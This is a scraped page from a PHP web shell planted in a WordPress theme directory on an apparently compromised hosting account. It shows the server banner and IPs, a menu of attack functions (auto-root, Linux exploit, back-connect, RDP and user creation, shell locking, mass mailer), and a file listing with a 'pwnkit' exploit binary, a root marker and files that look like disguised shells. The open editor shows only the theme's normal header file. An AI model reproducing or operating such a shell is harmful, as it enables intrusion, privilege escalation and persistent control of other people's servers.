Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
enliven /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
828
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive-jetpack-portfolio.php
2.17
KB
-rw-r--r--
archive-jetpack-testimonial.ph...
2.39
KB
-rw-r--r--
archive.php
1.81
KB
-rw-r--r--
comments.php
2.76
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
footer.php
1.98
KB
-rw-r--r--
functions.php
13.12
KB
-rw-r--r--
functionsbak.php
12.63
KB
-rw-r--r--
header.php
3.64
KB
-rw-r--r--
home.php
2.95
KB
-rw-r--r--
index.php
1.78
KB
-rw-r--r--
license.txt
17.32
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
page.php
1.54
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
9.38
KB
-rw-r--r--
screenshot.png
823.62
KB
-rw-r--r--
search.php
1.52
KB
-rw-r--r--
sidebar.php
298
B
-rw-r--r--
single-jetpack-portfolio.php
841
B
-rw-r--r--
single-jetpack-testimonial.php
814
B
-rw-r--r--
single.php
1.12
KB
-rw-r--r--
style.css
58.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for our theme. * * Displays all of the <head> section and everything up till <div id="content"> * * @package Enliven */ ?><!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <div id="page" class="hfeed site"> <a class="skip-link screen-reader-text" href="#content"><?php esc_html_e( 'Skip to content', 'enliven' ); ?></a> <?php do_action('enliven_before_header'); ?> <header id="masthead" class="site-header <?php echo enliven_header_class(); ?>" role="banner"> <div class="container"> <div class="row"> <div class="col-xs-10 col-md-4 col-lg-4"> <div class="site-branding"> <?php $logo = get_theme_mod( 'site_logo', '' ); $title_option = get_theme_mod( 'site_title_option', 'text-only' ); if ( $title_option == 'logo-only' && ! empty($logo) ) { ?> <div class="site-logo"> <a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><img src="<?php echo esc_url( $logo ); ?>" alt="<?php bloginfo( 'name' ); ?>"></a> </div> <?php } if ( $title_option == 'text-logo' && ! empty($logo) ) { ?> <div class="site-logo"> <a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><img src="<?php echo esc_url( $logo ); ?>" alt="<?php bloginfo( 'name' ); ?>"></a> </div> <div class="site-title-text"> <h1 class="site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></h1> <h2 class="site-description"><?php bloginfo( 'description' ); ?></h2> </div> <?php } if ( $title_option == 'text-only' ) { ?> <div class="site-title-text"> <h1 class="site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></h1> <h2 class="site-description"><?php bloginfo( 'description' ); ?></h2> </div> <?php } ?> </div><!-- .site-branding --> </div><!-- .bootstrap-cols --> <div class="col-xs-2 col-md-8 col-lg-8"> <nav id="site-navigation" class="main-navigation" role="navigation"> <?php wp_nav_menu( array( 'theme_location' => 'primary', 'menu_id' => 'primary-menu' ) ); ?> </nav><!-- #site-navigation --> <a href="#" class="navbutton" id="main-nav-button"></a> </div><!-- .bootstrap-cols --> </div><!-- .row --> </div><!-- .container --> </header><!-- #masthead --> <div class="responsive-mainnav-outer"> <div class="responsive-mainnav container"></div> </div> <?php do_action('enliven_after_header'); ?> <?php enliven_header_background(); ?> <div id="content" class="site-content">
Close